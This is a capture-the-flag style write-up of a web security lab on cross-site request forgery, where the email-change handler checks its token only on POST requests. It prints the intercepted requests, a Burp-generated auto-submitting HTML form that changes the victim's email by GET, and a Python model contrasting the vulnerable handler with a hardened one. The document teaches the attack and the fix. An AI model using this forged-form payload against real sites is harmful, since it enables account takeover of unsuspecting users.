CSRF where token validation depends on request method
Description
This lab's email change functionality is vulnerable to CSRF. It attempts to block CSRF attacks, but only applies defenses to certain types of requests.
To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer's email address.
You can log in to your own account using the following credentials: wiener:peter
Approach
After logging in with the provided credentials, I intercepted the change-email request and sent it to Burp Repeater:
POST /my-account/change-email HTTP/1.1
Host: 0a480016034a1a8c800d99c3003b007b.web-security-academy.net
Cookie: session=p1P0Pwfmc5NOkfkRSjhptAVGBIKB51LE
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0

email=qwe%40qwe.com&csrf=vJZ29hlEorCNt0eR9r2w3wmC0nEpdudx
I noticed that there is a CSRF token included in the request to protect against CSRF attacks. Initially, I tried creating a CSRF PoC and sending it to the victim, but it didn't work. Given the lab title, which hinted that token validation might depend on the request method, I decided to change the POST request to a GET request. Then, I generated a new CSRF PoC and sent it to the victim.
Here is the modified GET request:
GET /my-account/change-email?email=qwe%40qwe.com&csrf=vJZ29hlEorCNt0eR9r2w3wmC0nEpdudx HTTP/1.1
Host: 0a480016034a1a8c800d99c3003b007b.web-security-academy.net
Cookie: session=p1P0Pwfmc5NOkfkRSjhptAVGBIKB51LE
...
By right-clicking the request and selecting Engagement tools / Generate CSRF PoC, I generated the following HTML:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://0a480016034a1a8c800d99c3003b007b.web-security-academy.net/my-account/change-email">
<input type="hidden" name="email" value="ichyaboy@hacked.com" />
<input type="hidden" name="csrf" value="vJZ29hlEorCNt0eR9r2w3wmC0nEpdudx" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
I modified the email value to a new one to avoid any errors related to reused email addresses. After copying the CSRF PoC, I placed it in my malicious page on the exploit server.
By clicking Store and then Deliver exploit to victim, I saw that the lab was solved, confirming the change of the victim's email.
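To show why the lab's defense fails and what the fix looks like, here is an added, self-contained Python model of the change-email handler (my own illustration, not the lab's server code). It places a vulnerable handler that checks the token only on POST beside a hardened one that refuses non-POST state changes and validates the token against the session on every request; the session ids, tokens and addresses are constructed for the example.

```python
import hmac
import secrets


def _token_matches(session, params):
    """Constant-time comparison of the submitted token with the session's own token."""
    return hmac.compare_digest(params.get("csrf", ""), session["csrf"])


def change_email_vulnerable(method, params, session):
    """Reproduces the lab's defect: the CSRF token is only checked for POST."""
    if method == "POST" and not _token_matches(session, params):
        return 400, "invalid CSRF token"
    session["email"] = params["email"]  # a GET reaches this line unchecked
    return 302, "email updated"


def change_email_hardened(method, params, session):
    """State changes are POST-only, and the token is tied to the session for every request."""
    if method != "POST":
        return 405, "method not allowed"
    if not _token_matches(session, params):
        return 400, "invalid CSRF token"
    session["email"] = params["email"]
    return 302, "email updated"


def _fresh_session(email):
    # Constructed per-session state: the token is bound to this session only.
    return {"csrf": secrets.token_urlsafe(24), "email": email}


def forged_get_changes_email(handler):
    """Models the lab's cross-site GET: the browser attaches the victim's session
    cookie, but the form carries a token taken from a different (attacker) session."""
    victim = _fresh_session("wiener@example.com")      # constructed victim session
    foreign = _fresh_session("other@example.com")      # constructed unrelated session
    params = {"email": "changed@example.com", "csrf": foreign["csrf"]}
    handler("GET", params, victim)
    return victim["email"] == "changed@example.com"


def legit_post_succeeds(handler):
    """A same-site POST carrying the session's own token must still be accepted."""
    victim = _fresh_session("wiener@example.com")
    params = {"email": "new@example.com", "csrf": victim["csrf"]}
    status, _ = handler("POST", params, victim)
    return status == 302 and victim["email"] == "new@example.com"
```

The two simulation helpers make the difference observable: the forged GET rewrites the email under the vulnerable handler and is rejected with 405 under the hardened one, while a legitimate POST works with both.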